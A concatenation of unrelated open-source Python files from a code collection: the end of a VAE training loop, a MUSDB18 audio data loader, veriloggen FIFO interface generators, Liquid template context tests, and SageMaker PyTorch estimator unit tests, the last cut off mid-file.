z_mu, z_var = Q(X)
z = sample_z(z_mu, z_var)
X_sample = P(z)
# Loss
recon_loss = nn.binary_cross_entropy(X_sample, X, size_average=False) / mb_size
kl_loss = torch.mean(0.5 * torch.sum(torch.exp(z_var) + z_mu**2 - 1. - z_var, 1))
loss = recon_loss + kl_loss
# Backward
loss.backward()
# Update
solver.step()
# Housekeeping
for p in params:
p.grad.data.zero_()
# Print and plot every now and then
if it % 1000 == 0:
print('Iter-{}; Loss: {:.4}'.format(it, loss.data[0]))
samples = P(z).data.numpy()[:16]
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(28, 28), cmap='Greys_r')
if not os.path.exists('out/'):
os.makedirs('out/')
plt.savefig('out/{}.png'.format(str(c).zfill(3)), bbox_inches='tight')
c += 1
plt.close(fig)
|
the-stack_106_19078
|
# -*- coding: utf-8 -*-
__author__ = 'S.I. Mimilakis'
__copyright__ = 'Fraunhofer IDMT'
# imports
import os
import torch
import numpy as np
from tools import io_methods as io
class DataIO:
""" Class for data
input-output passing.
"""
def __init__(self, exp_settings={}):
super(DataIO, self).__init__()
# definitions
self.dataset_path = '/some/path/Datasets/musdb18/'
self.keywords = ['bass.wav', 'drums.wav', 'other.wav', 'vocals.wav', 'mixture.wav']
self.foldersList = ['train', 'test']
self.d_p_length = exp_settings['d_p_length']
self.fs = exp_settings['fs']
self.batch_overlap = exp_settings['batch_overlap']
self.batch_size = exp_settings['batch_size']
self.loudness_threshold = exp_settings['loudness_threshold']
try:
self.channel_augmentation = exp_settings['ch_augment']
self.gain_augmentation = exp_settings['gain_augment']
except KeyError:
self.channel_augmentation = False
self.gain_augmentation = False
def get_data(self, current_set, set_size, monaural=True, dev=True):
"""
Method to load training data.
current_set : (int) An integer denoting the current training set (Starting from "1").
set_size : (int) The amount of files a set has.
monaural : (bool) Return monaural audio files or not.
Returns:
mix_out : (numpy array) The mixture signal waveform (samples x channels)
vox_out : (numpy array) The vocal signal waveform (samples x channels)
bkg_out : (numpy array) The background signal waveform (samples x channels)
"""
if dev:
folders_list = self.foldersList[0]
else:
folders_list = self.foldersList[1]
# Generate full paths for dev and test
dev_list = sorted(os.listdir(self.dataset_path + folders_list))
dev_list = [self.dataset_path + folders_list + '/' + i for i in dev_list]
# Current lists for training
c_train_mlist = dev_list[(current_set - 1) * set_size: current_set * set_size]
mix_out = np.array([])
vox_out = np.array([])
bkg_out = np.array([])
if not monaural:
mix_out.shape = (0, 2)
vox_out.shape = (0, 2)
bkg_out.shape = (0, 2)
for index in range(len(c_train_mlist)):
# Reading
vocal_signal, or_fs = io.wav_read(os.path.join(c_train_mlist[index], self.keywords[3]), mono=False)
mix_signal, or_fs = io.wav_read(os.path.join(c_train_mlist[index], self.keywords[4]), mono=False)
if self.channel_augmentation:
fl_channels = np.random.permutation(2)
vocal_signal = vocal_signal[:, fl_channels]
mix_signal = mix_signal[:, fl_channels]
bkg_signal = mix_signal - vocal_signal
if self.gain_augmentation:
gain = np.random.uniform(0.7, 1.05)
vocal_signal *= gain
mix_signal = bkg_signal + vocal_signal
if monaural and len(mix_signal.shape) == 2:
vocal_signal = np.mean(vocal_signal, axis=-1)
mix_signal = np.mean(mix_signal, axis=-1)
bkg_signal = np.mean(bkg_signal, axis=-1)
mix_out = np.concatenate([mix_out, mix_signal], axis=0)
vox_out = np.concatenate([vox_out, vocal_signal], axis=0)
bkg_out = np.concatenate([bkg_out, bkg_signal], axis=0)
return mix_out, vox_out, bkg_out
def gimme_batches(self, wav_in):
d_p_length_samples = self.d_p_length * self.fs
resize_factor = d_p_length_samples - self.batch_overlap
trim_frame = wav_in.shape[0] % resize_factor
trim_frame -= resize_factor
trim_frame = np.abs(trim_frame)
# Zero-padding
if trim_frame != 0:
wav_in = np.pad(wav_in, (0, trim_frame), 'constant', constant_values=0)
# Reshaping with overlap
strides = (resize_factor * wav_in.itemsize, wav_in.itemsize)
shape = (1 + int((wav_in.nbytes - d_p_length_samples * wav_in.itemsize) / strides[0]),
d_p_length_samples)
wav_in = np.lib.stride_tricks.as_strided(wav_in, shape=shape, strides=strides)
b_trim_frame = wav_in.shape[0] % self.batch_size
b_trim_frame -= self.batch_size
b_trim_frame = np.abs(b_trim_frame)
# Zero-padding
if b_trim_frame != 0:
wav_in = np.pad(wav_in, (0, b_trim_frame), 'constant', constant_values=(0, 0))
return wav_in[:, :d_p_length_samples]
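    # Note on gimme_batches() above (comment only): the as_strided call builds
    # overlapping windows of d_p_length * fs samples that advance by
    # (d_p_length * fs - batch_overlap) samples per row, so consecutive rows
    # share exactly `batch_overlap` samples of audio.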
def gimme_batches_stereo(self, st_wav_in):
wav_l = self.gimme_batches(st_wav_in[:, 0])
wav_r = self.gimme_batches(st_wav_in[:, 1])
return np.stack((wav_l, wav_r), axis=1)
@staticmethod
def batches_from_numpy(st_batch_in):
        if torch.cuda.is_available():  # check for a usable GPU, not just a CUDA-enabled build
return torch.from_numpy(st_batch_in).cuda().float()
else:
return torch.from_numpy(st_batch_in).float()
if __name__ == '__main__':
io_dealer = DataIO()
mix, vox, bkg = io_dealer.get_data(42, 4, monaural=True)
b_mix = io_dealer.gimme_batches(mix)
# EOF
|
the-stack_106_19079
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen.core.vtypes as vtypes
import veriloggen.core.module as module
from veriloggen.seq.seq import Seq
from . import util
class FifoWriteInterface(object):
_I = 'Reg'
_O = 'Wire'
def __init__(self, m, name=None, datawidth=32, itype=None, otype=None,
p_enq='enq', p_wdata='wdata', p_full='full', p_almost_full='almost_full'):
if itype is None:
itype = self._I
if otype is None:
otype = self._O
self.m = m
name_enq = p_enq if name is None else '_'.join([name, p_enq])
name_wdata = p_wdata if name is None else '_'.join([name, p_wdata])
name_full = p_full if name is None else '_'.join([name, p_full])
name_almost_full = p_almost_full if name is None else '_'.join(
[name, p_almost_full])
self.enq = util.make_port(m, itype, name_enq, initval=0)
self.wdata = util.make_port(m, itype, name_wdata, datawidth, initval=0)
self.full = util.make_port(m, otype, name_full, initval=0)
self.almost_full = util.make_port(
m, otype, name_almost_full, initval=0)
def connect(self, targ):
self.enq.connect(targ.enq)
self.wdata.connect(targ.wdata)
targ.full.connect(self.full)
targ.almost_full.connect(self.almost_full)
class FifoReadInterface(object):
_I = 'Reg'
_O = 'Wire'
def __init__(self, m, name=None, datawidth=32, itype=None, otype=None,
p_deq='deq', p_rdata='rdata', p_empty='empty', p_almost_empty='almost_empty'):
if itype is None:
itype = self._I
if otype is None:
otype = self._O
self.m = m
name_deq = p_deq if name is None else '_'.join([name, p_deq])
name_rdata = p_rdata if name is None else '_'.join([name, p_rdata])
name_empty = p_empty if name is None else '_'.join([name, p_empty])
name_almost_empty = p_almost_empty if name is None else '_'.join(
[name, p_almost_empty])
self.deq = util.make_port(m, itype, name_deq, initval=0)
self.rdata = util.make_port(m, otype, name_rdata, datawidth, initval=0)
self.empty = util.make_port(m, otype, name_empty, initval=0)
self.almost_empty = util.make_port(
m, otype, name_almost_empty, initval=0)
def connect(self, targ):
self.deq.connect(targ.deq)
targ.rdata.connect(self.rdata)
targ.empty.connect(self.empty)
targ.almost_empty.connect(self.almost_empty)
class FifoWriteSlaveInterface(FifoWriteInterface):
_I = 'Input'
_O = 'Output'
class FifoWriteMasterInterface(FifoWriteInterface):
_I = 'Output'
_O = 'Input'
class FifoReadSlaveInterface(FifoReadInterface):
_I = 'Input'
_O = 'Output'
class FifoReadMasterInterface(FifoReadInterface):
_I = 'Output'
_O = 'Input'
#-------------------------------------------------------------------------
def mkFifoDefinition(name, datawidth=32, addrwidth=4):
m = module.Module(name)
clk = m.Input('CLK')
rst = m.Input('RST')
wif = FifoWriteSlaveInterface(m, name, datawidth)
rif = FifoReadSlaveInterface(m, name, datawidth)
mem = m.Reg('mem', datawidth, 2**addrwidth)
head = m.Reg('head', addrwidth, initval=0)
tail = m.Reg('tail', addrwidth, initval=0)
is_empty = m.Wire('is_empty')
is_almost_empty = m.Wire('is_almost_empty')
is_full = m.Wire('is_full')
is_almost_full = m.Wire('is_almost_full')
mask = (2 ** addrwidth) - 1
is_empty.assign(head == tail)
is_almost_empty.assign(head == ((tail + 1) & mask))
is_full.assign(((head + 1) & mask) == tail)
is_almost_full.assign(((head + 2) & mask) == tail)
rdata = m.Reg('rdata_reg', datawidth, initval=0)
wif.full.assign(is_full)
wif.almost_full.assign(vtypes.Ors(is_almost_full, is_full))
rif.empty.assign(is_empty)
rif.almost_empty.assign(vtypes.Ors(is_almost_empty, is_empty))
seq = Seq(m, '', clk, rst)
seq.If(vtypes.Ands(wif.enq, vtypes.Not(is_full)))(
mem[head](wif.wdata),
head.inc()
)
seq.If(vtypes.Ands(rif.deq, vtypes.Not(is_empty)))(
rdata(mem[tail]),
tail.inc()
)
rif.rdata.assign(rdata)
seq.make_always()
return m
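# Illustrative usage (comment only, assuming the usual veriloggen API):
#   fifo = mkFifoDefinition('my_fifo', datawidth=32, addrwidth=4)
#   print(fifo.to_verilog())   # emit the generated Verilog source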
|
the-stack_106_19080
|
"""Bad context test cases."""
from unittest import TestCase
from typing import NamedTuple
from typing import Type
from liquid.context import builtin
from liquid.context import get_item
from liquid.context import _undefined
from liquid.context import ReadOnlyChainMap
from liquid.environment import Environment
from liquid.exceptions import LiquidTypeError
from liquid.exceptions import lookup_warning
from liquid.mode import Mode
class Case(NamedTuple):
"""Table driven test case helper."""
description: str
template: str
expect_exception: Type[Exception]
expect_msg: str
expect_render: str = ""
class BadContextTemplateTestCase(TestCase):
"""Bad context test case."""
def _test(self, test_cases, mode=Mode.STRICT):
"""Helper method for running lists of `Case`s"""
env = Environment()
env.mode = mode
global_context = {"arr": [], "hash": {}}
for case in test_cases:
with self.subTest(msg=case.description):
if mode == Mode.STRICT:
with self.assertRaises(case.expect_exception) as raised:
template = env.from_string(
case.template, globals=global_context
)
result = template.render()
self.assertEqual(str(raised.exception), case.expect_msg)
elif mode == Mode.WARN:
with self.assertWarns(lookup_warning(case.expect_exception)):
template = env.from_string(
case.template, globals=global_context
)
result = template.render()
elif mode == Mode.LAX:
template = env.from_string(case.template, globals=global_context)
result = template.render()
self.assertEqual(result, case.expect_render)
def test_bad_context(self):
"""Test that we handle render time errors due to incorrect context."""
test_cases = [
Case(
description="array less than hash",
template="{% if arr < hash %}foo{% endif %}",
expect_exception=LiquidTypeError,
expect_msg=r"invalid operator for types '[] < {}', on line 1",
),
]
self._test(test_cases, mode=Mode.STRICT)
self._test(test_cases, mode=Mode.WARN)
self._test(test_cases, mode=Mode.LAX)
class ReadOnlyChainMapTestCase(TestCase):
"""Read only chain map test case."""
def test_get(self):
"""Test that we can get items from a chain map."""
test_cases = [
{
"description": "earlier maps take priority",
"maps": ({"foo": 1}, {"foo": 2}),
"expect": 1,
},
{
"description": "fall back top later maps",
"maps": ({"bar": 1}, {"foo": 2}),
"expect": 2,
},
{
"description": "default to None",
"maps": ({"bar": 1}, {"bar": 2}),
"expect": None,
},
]
for case in test_cases:
with self.subTest(msg=case["description"]):
chain_map = ReadOnlyChainMap(*case["maps"])
self.assertEqual(chain_map.get("foo"), case["expect"])
def test_iter(self):
"""Test that we can iterate a chain map."""
chain_map = ReadOnlyChainMap({"foo": 1}, {"bar": 2}, {"foo": 3})
self.assertEqual(list(chain_map), ["foo", "bar", "foo"])
class ChainedItemGetterTestCase(TestCase):
"""Chained item getter test case."""
def test_get_item(self):
"""Test that we can get nested items."""
test_cases = [
{
"description": "single string key",
"obj": {"foo": 1},
"key": ["foo"],
"expect": 1,
},
{
"description": "chained string key",
"obj": {"foo": {"bar": 2}},
"key": ["foo", "bar"],
"expect": 2,
},
{
"description": "single int key",
"obj": ["foo", "bar"],
"key": [0],
"expect": "foo",
},
{
"description": "chained string and int key",
"obj": {"foo": [1, 2]},
"key": ["foo", 1],
"expect": 2,
},
{
"description": "default to undefined",
"obj": {"foo": 1},
"key": ["no", "such", "thing"],
"expect": _undefined,
},
]
for case in test_cases:
with self.subTest(msg=case["description"]):
self.assertEqual(get_item(case["obj"], *case["key"]), case["expect"])
class BuiltinDynamicScopeTestCase(TestCase):
"""Built-in dynamic scope test case."""
def test_builtin_contains_now(self):
"""Test that `now` is in the builtin scope."""
self.assertTrue("now" in builtin)
def test_builtin_contains_today(self):
"""Test that `today` is in the builtin scope."""
self.assertTrue("today" in builtin)
def test_builtin_not_contains(self):
"""Test that garbage is not in the builtin scope."""
self.assertFalse("foo" in builtin)
def test_builtin_length(self):
"""Test that builtin has a length."""
self.assertEqual(len(builtin), 2)
def test_builtin_iter(self):
"""Test that builtin has a length."""
self.assertEqual(list(builtin), ["now", "today"])
|
the-stack_106_19081
|
import argparse
import re
from pathlib import Path
from typing import Iterable
from typing import Set
import pkg_resources
from black import find_project_root
from black import gen_python_files_in_dir
from black import get_gitignore
from black import Report
from reorder_python_imports import fix_file_contents
EXCLUDES = re.compile(
r"/(\.eggs|\.git|\.hg|\.mypy_cache|\.nox|\.tox|\.venv|_build|buck-out|build|dist)/"
)
INCLUDES = re.compile(r"\.py$")
def get_source_files(paths: Iterable[str]) -> Iterable[Path]:
report = Report()
root = find_project_root((f for f in paths))
sources: Set[Path] = set()
for filename in paths:
path = Path(filename)
if path.is_dir():
sources.update(
gen_python_files_in_dir(
path=path,
root=root,
include=INCLUDES,
exclude=EXCLUDES,
report=report,
gitignore=get_gitignore(root),
)
)
elif path.is_file():
sources.add(path)
else:
print(f"Error: invalid path: {path}")
exit(1)
return sources
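# Note (comment only): get_source_files() reuses black's project-root discovery,
# include/exclude regexes and .gitignore handling, so `sorti <dir>` visits the
# same set of .py files that black itself would consider under that directory.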
def get_version() -> str:
return pkg_resources.require("sorti")[0].version
def main() -> int:
parser = argparse.ArgumentParser(
description="Sorts imports in Python 3.7+ source files."
)
parser.add_argument("source", nargs="*")
parser.add_argument(
"--check",
action="store_true",
help="Check if sorti would like to make changes.",
)
parser.add_argument(
"--version", action="version", version=f"%(prog)s {get_version()}"
)
args = parser.parse_args()
if not args.source:
print("No sources given, doing nothing.")
return 0
sources = tuple(args.source)
num_would_change = 0
for path in get_source_files(sources):
with path.open("r") as file:
contents = file.read()
new_contents = fix_file_contents(contents)
if contents == new_contents:
continue
if args.check:
print(f"Would reformat {path}")
num_would_change += 1
continue
print(f"Reordering imports in {path}")
with path.open("w") as file:
file.write(new_contents)
if num_would_change and args.check:
print(
f"sorti would sort imports in {num_would_change} "
f"file{'s' if num_would_change != 1 else ''} "
)
return 1
elif args.check:
print("sorti would make no changes, all imports are sorted")
return 0
if __name__ == "__main__":
exit(main())
|
the-stack_106_19082
|
## ECCV-2018-Image Super-Resolution Using Very Deep Residual Channel Attention Networks
## https://arxiv.org/abs/1807.02758
from model import common
from model.attention import ContextualAttention
import torch.nn as nn
import torch
def make_model(args, parent=False):
return RCAN(args)
## Channel Attention (CA) Layer
class CALayer(nn.Module):
def __init__(self, channel, reduction=16):
super(CALayer, self).__init__()
# global average pooling: feature --> point
self.avg_pool = nn.AdaptiveAvgPool2d(1)
# feature channel downscale and upscale --> channel weight
#self.a = torch.nn.Parameter(torch.Tensor([0]))
#self.a.requires_grad=True
self.conv_du = nn.Sequential(
nn.Conv2d(channel, channel // reduction, 1, padding=0, bias=True),
nn.ReLU(inplace=True),
nn.Conv2d(channel // reduction, channel, 1, padding=0, bias=True),
nn.Sigmoid()
)
def forward(self, x):
y = self.avg_pool(x)
y = self.conv_du(y)
return x * y
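# Shape sketch (comment only): for an input of shape (N, C, H, W) the CA layer
# pools to (N, C, 1, 1), squeezes channels to C // reduction, expands back to C
# and applies a sigmoid, so the block output is the input rescaled per channel
# by attention weights in (0, 1).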
## Residual Channel Attention Block (RCAB)
class RCAB(nn.Module):
def __init__(
self, conv, n_feat, kernel_size, reduction,
bias=True, bn=False, act=nn.ReLU(True), res_scale=1):
super(RCAB, self).__init__()
modules_body = []
for i in range(2):
modules_body.append(conv(n_feat, n_feat, kernel_size, bias=bias))
if bn: modules_body.append(nn.BatchNorm2d(n_feat))
if i == 0: modules_body.append(act)
modules_body.append(CALayer(n_feat, reduction))
self.body = nn.Sequential(*modules_body)
self.res_scale = res_scale
def forward(self, x):
res = self.body(x)
#res = self.body(x).mul(self.res_scale)
res += x
return res
## Residual Group (RG)
class ResidualGroup(nn.Module):
def __init__(self, conv, n_feat, kernel_size, reduction, act, res_scale, n_resblocks):
super(ResidualGroup, self).__init__()
modules_body = []
modules_body = [
RCAB(
conv, n_feat, kernel_size, reduction, bias=True, bn=False, act=nn.ReLU(True), res_scale=1) \
for _ in range(n_resblocks)]
modules_body.append(conv(n_feat, n_feat, kernel_size))
self.body = nn.Sequential(*modules_body)
def forward(self, x):
res = self.body(x)
res += x
return res
## Residual Channel Attention Network (RCAN)
class RCAN(nn.Module):
def __init__(self, args, conv=common.default_conv):
super(RCAN, self).__init__()
self.a = nn.Parameter(torch.Tensor([0]))
self.a.requires_grad=True
n_resgroups = args.n_resgroups
n_resblocks = args.n_resblocks
n_feats = args.n_feats
kernel_size = 3
reduction = args.reduction
scale = args.scale[0]
act = nn.ReLU(True)
# RGB mean for DIV2K
rgb_mean = (0.4488, 0.4371, 0.4040)
rgb_std = (1.0, 1.0, 1.0)
self.sub_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std)
# define head module
modules_head = [conv(args.n_colors, n_feats, kernel_size)]
self.msa = ContextualAttention()
# define body module
modules_body = [
ResidualGroup(
conv, n_feats, kernel_size, reduction, act=act, res_scale=args.res_scale, n_resblocks=n_resblocks) \
for _ in range(5)]
modules_body.append(self.msa)
for i in range(5):
modules_body.append(ResidualGroup(conv,n_feats,kernel_size,reduction,act=act,res_scale=args.res_scale,n_resblocks=n_resblocks))
modules_body.append(conv(n_feats, n_feats, kernel_size))
# define tail module
modules_tail = [
common.Upsampler(conv, scale, n_feats, act=False),
conv(n_feats, args.n_colors, kernel_size)]
self.add_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std, 1)
self.head = nn.Sequential(*modules_head)
self.body = nn.Sequential(*modules_body)
self.tail = nn.Sequential(*modules_tail)
def forward(self, x):
x = self.sub_mean(x)
x = self.head(x)
res = self.body(x)
res += x
x = self.tail(res)
x = self.add_mean(x)
return x
def load_state_dict(self, state_dict, strict=False):
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, nn.Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
                    if name.find('msa') >= 0 or name.find('a') >= 0:
print('Replace pre-trained upsampler to new one...')
else:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
if name.find('msa') == -1:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
if strict:
missing = set(own_state.keys()) - set(state_dict.keys())
if len(missing) > 0:
raise KeyError('missing keys in state_dict: "{}"'.format(missing))
|
the-stack_106_19084
|
import csv
from DACS import iso2DACS
windowsPath = "C:\\Users\\[USERNAME]\\python4archivists\\executedJuveniles.csv"
unixPath = "/home/[USERNAME]/python4archivists/executedJuveniles.csv"
csvFile = open(windowsPath, "r")
csvObject = csv.reader(csvFile)
#loop though the CSV file
for row in csvObject:
print(row[2])
csvFile.close()
"""
#set and empty list and initialize the count at 0
newList = []
rowCount = 0
#open the original CSV again and read it
csvFile = open(windowsPath, "r")
csvObject = csv.reader(csvFile)
for row in csvObject:
#count the number of times though the loop
rowCount = rowCount + 1
#if more than the first time though the loop
if rowCount > 1:
#make a list of the rowCount, the 3rd column, and the 4th column using the iso2DACS function
rowList = [rowCount - 1, row[2], iso2DACS(row[3])]
#append that list to the newList - its just a list of lists
newList.append(rowList)
#close the original CSV file
csvFile.close()
newCSV = "C:\\Users\\[USERNAME]\\python4archivists\\csvDACS.csv"
#newCSV = "/home/[USERNAME]/python4archivists/csvDACS.csv"
newFile = open(newCSV, "wb")
newCSV = csv.writer(newFile, delimiter=',')
newCSV.writerows(newList)
newFile.close()
"""
|
the-stack_106_19085
|
# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import logging
import json
import os
import pytest
import sys
from mock import ANY, MagicMock, Mock, patch
from sagemaker.pytorch import defaults
from sagemaker.pytorch import PyTorch
from sagemaker.pytorch import PyTorchPredictor, PyTorchModel
DATA_DIR = os.path.join(os.path.dirname(__file__), "..", "data")
SCRIPT_PATH = os.path.join(DATA_DIR, "dummy_script.py")
SERVING_SCRIPT_FILE = "another_dummy_script.py"
MODEL_DATA = "s3://some/data.tar.gz"
TIMESTAMP = "2017-11-06-14:14:15.672"
TIME = 1507167947
BUCKET_NAME = "mybucket"
INSTANCE_COUNT = 1
INSTANCE_TYPE = "ml.c4.4xlarge"
ACCELERATOR_TYPE = "ml.eia.medium"
PYTHON_VERSION = "py" + str(sys.version_info.major)
IMAGE_NAME = "sagemaker-pytorch"
JOB_NAME = "{}-{}".format(IMAGE_NAME, TIMESTAMP)
IMAGE_URI_FORMAT_STRING = "520713654638.dkr.ecr.{}.amazonaws.com/{}:{}-{}-{}"
ROLE = "Dummy"
REGION = "us-west-2"
GPU = "ml.p2.xlarge"
CPU = "ml.c4.xlarge"
ENDPOINT_DESC = {"EndpointConfigName": "test-endpoint"}
ENDPOINT_CONFIG_DESC = {"ProductionVariants": [{"ModelName": "model-1"}, {"ModelName": "model-2"}]}
LIST_TAGS_RESULT = {"Tags": [{"Key": "TagtestKey", "Value": "TagtestValue"}]}
EXPERIMENT_CONFIG = {
"ExperimentName": "exp",
"TrialName": "trial",
"TrialComponentDisplayName": "tc",
}
@pytest.fixture(name="sagemaker_session")
def fixture_sagemaker_session():
boto_mock = Mock(name="boto_session", region_name=REGION)
session = Mock(
name="sagemaker_session",
boto_session=boto_mock,
boto_region_name=REGION,
config=None,
local_mode=False,
s3_resource=None,
s3_client=None,
)
describe = {"ModelArtifacts": {"S3ModelArtifacts": "s3://m/m.tar.gz"}}
session.sagemaker_client.describe_training_job = Mock(return_value=describe)
session.sagemaker_client.describe_endpoint = Mock(return_value=ENDPOINT_DESC)
session.sagemaker_client.describe_endpoint_config = Mock(return_value=ENDPOINT_CONFIG_DESC)
session.sagemaker_client.list_tags = Mock(return_value=LIST_TAGS_RESULT)
session.default_bucket = Mock(name="default_bucket", return_value=BUCKET_NAME)
session.expand_role = Mock(name="expand_role", return_value=ROLE)
return session
def _get_full_cpu_image_uri(version, py_version=PYTHON_VERSION):
return IMAGE_URI_FORMAT_STRING.format(REGION, IMAGE_NAME, version, "cpu", py_version)
def _get_full_gpu_image_uri(version, py_version=PYTHON_VERSION):
return IMAGE_URI_FORMAT_STRING.format(REGION, IMAGE_NAME, version, "gpu", py_version)
def _get_full_cpu_image_uri_with_ei(version, py_version=PYTHON_VERSION):
return _get_full_cpu_image_uri(version, py_version=py_version) + "-eia"
def _pytorch_estimator(
sagemaker_session,
framework_version=defaults.PYTORCH_VERSION,
train_instance_type=None,
base_job_name=None,
**kwargs
):
return PyTorch(
entry_point=SCRIPT_PATH,
framework_version=framework_version,
py_version=PYTHON_VERSION,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=train_instance_type if train_instance_type else INSTANCE_TYPE,
base_job_name=base_job_name,
**kwargs
)
def _create_train_job(version):
return {
"image": _get_full_cpu_image_uri(version),
"input_mode": "File",
"input_config": [
{
"ChannelName": "training",
"DataSource": {
"S3DataSource": {
"S3DataDistributionType": "FullyReplicated",
"S3DataType": "S3Prefix",
}
},
}
],
"role": ROLE,
"job_name": JOB_NAME,
"output_config": {"S3OutputPath": "s3://{}/".format(BUCKET_NAME)},
"resource_config": {
"InstanceType": "ml.c4.4xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
},
"hyperparameters": {
"sagemaker_program": json.dumps("dummy_script.py"),
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": str(logging.INFO),
"sagemaker_job_name": json.dumps(JOB_NAME),
"sagemaker_submit_directory": json.dumps(
"s3://{}/{}/source/sourcedir.tar.gz".format(BUCKET_NAME, JOB_NAME)
),
"sagemaker_region": '"us-west-2"',
},
"stop_condition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"tags": None,
"vpc_config": None,
"metric_definitions": None,
"experiment_config": None,
"debugger_hook_config": {
"CollectionConfigurations": [],
"S3OutputPath": "s3://{}/".format(BUCKET_NAME),
},
}
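# Note (comment only): the dictionary returned by _create_train_job() mirrors
# the keyword arguments that sagemaker_session.train() is expected to receive,
# so tests can compare it directly against the arguments recorded by the mock.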
def test_create_model(sagemaker_session, pytorch_version):
container_log_level = '"logging.INFO"'
source_dir = "s3://mybucket/source"
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
framework_version=pytorch_version,
container_log_level=container_log_level,
base_job_name="job",
source_dir=source_dir,
)
job_name = "new_name"
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
model = pytorch.create_model()
assert model.sagemaker_session == sagemaker_session
assert model.framework_version == pytorch_version
assert model.py_version == pytorch.py_version
assert model.entry_point == SCRIPT_PATH
assert model.role == ROLE
assert model.name == job_name
assert model.container_log_level == container_log_level
assert model.source_dir == source_dir
assert model.vpc_config is None
def test_create_model_with_optional_params(sagemaker_session):
container_log_level = '"logging.INFO"'
source_dir = "s3://mybucket/source"
enable_cloudwatch_metrics = "true"
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
container_log_level=container_log_level,
base_job_name="job",
source_dir=source_dir,
enable_cloudwatch_metrics=enable_cloudwatch_metrics,
)
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
new_role = "role"
model_server_workers = 2
vpc_config = {"Subnets": ["foo"], "SecurityGroupIds": ["bar"]}
model = pytorch.create_model(
role=new_role,
model_server_workers=model_server_workers,
vpc_config_override=vpc_config,
entry_point=SERVING_SCRIPT_FILE,
)
assert model.role == new_role
assert model.model_server_workers == model_server_workers
assert model.vpc_config == vpc_config
assert model.entry_point == SERVING_SCRIPT_FILE
def test_create_model_with_custom_image(sagemaker_session):
container_log_level = '"logging.INFO"'
source_dir = "s3://mybucket/source"
image = "pytorch:9000"
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
container_log_level=container_log_level,
image_name=image,
base_job_name="job",
source_dir=source_dir,
)
job_name = "new_name"
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
model = pytorch.create_model()
assert model.sagemaker_session == sagemaker_session
assert model.image == image
assert model.entry_point == SCRIPT_PATH
assert model.role == ROLE
assert model.name == job_name
assert model.container_log_level == container_log_level
assert model.source_dir == source_dir
@patch("sagemaker.utils.create_tar_file", MagicMock())
@patch("time.strftime", return_value=TIMESTAMP)
def test_pytorch(strftime, sagemaker_session, pytorch_version):
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
framework_version=pytorch_version,
py_version=PYTHON_VERSION,
)
inputs = "s3://mybucket/train"
pytorch.fit(inputs=inputs, experiment_config=EXPERIMENT_CONFIG)
sagemaker_call_names = [c[0] for c in sagemaker_session.method_calls]
assert sagemaker_call_names == ["train", "logs_for_job"]
boto_call_names = [c[0] for c in sagemaker_session.boto_session.method_calls]
assert boto_call_names == ["resource"]
expected_train_args = _create_train_job(pytorch_version)
expected_train_args["input_config"][0]["DataSource"]["S3DataSource"]["S3Uri"] = inputs
expected_train_args["experiment_config"] = EXPERIMENT_CONFIG
actual_train_args = sagemaker_session.method_calls[0][2]
assert actual_train_args == expected_train_args
model = pytorch.create_model()
expected_image_base = "520713654638.dkr.ecr.us-west-2.amazonaws.com/sagemaker-pytorch:{}-gpu-{}"
assert {
"Environment": {
"SAGEMAKER_SUBMIT_DIRECTORY": "s3://mybucket/sagemaker-pytorch-{}/source/sourcedir.tar.gz".format(
TIMESTAMP
),
"SAGEMAKER_PROGRAM": "dummy_script.py",
"SAGEMAKER_ENABLE_CLOUDWATCH_METRICS": "false",
"SAGEMAKER_REGION": "us-west-2",
"SAGEMAKER_CONTAINER_LOG_LEVEL": "20",
},
"Image": expected_image_base.format(pytorch_version, PYTHON_VERSION),
"ModelDataUrl": "s3://m/m.tar.gz",
} == model.prepare_container_def(GPU)
assert "cpu" in model.prepare_container_def(CPU)["Image"]
predictor = pytorch.deploy(1, GPU)
assert isinstance(predictor, PyTorchPredictor)
@patch("sagemaker.utils.create_tar_file", MagicMock())
def test_model(sagemaker_session):
model = PyTorchModel(
MODEL_DATA, role=ROLE, entry_point=SCRIPT_PATH, sagemaker_session=sagemaker_session
)
predictor = model.deploy(1, GPU)
assert isinstance(predictor, PyTorchPredictor)
@patch("sagemaker.utils.create_tar_file", MagicMock())
@patch("sagemaker.utils.repack_model")
